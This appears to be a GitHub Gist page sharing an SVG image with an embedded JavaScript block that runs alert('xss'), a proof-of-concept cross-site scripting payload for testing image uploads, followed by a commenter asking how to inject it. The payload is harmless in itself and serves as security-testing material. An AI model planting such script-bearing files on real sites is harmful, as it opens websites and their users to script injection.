Created
August 12, 2019 18:28
-
-
Save rudSarkar/76f1ce7a65c356a5cd71d058ab76a344 to your computer and use it in GitHub Desktop.
SVG Image XSS File
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" standalone="no"?> | |
| <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> | |
| <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> | |
| <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> | |
| <script type="text/javascript"> | |
| alert('xss'); | |
| </script> | |
| </svg> |
MohandSadakah
commented
Jul 12, 2024
<script type="text/javascript">
alert('xss');
</script>
How to inject..exif tool doesn't work on svg images
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment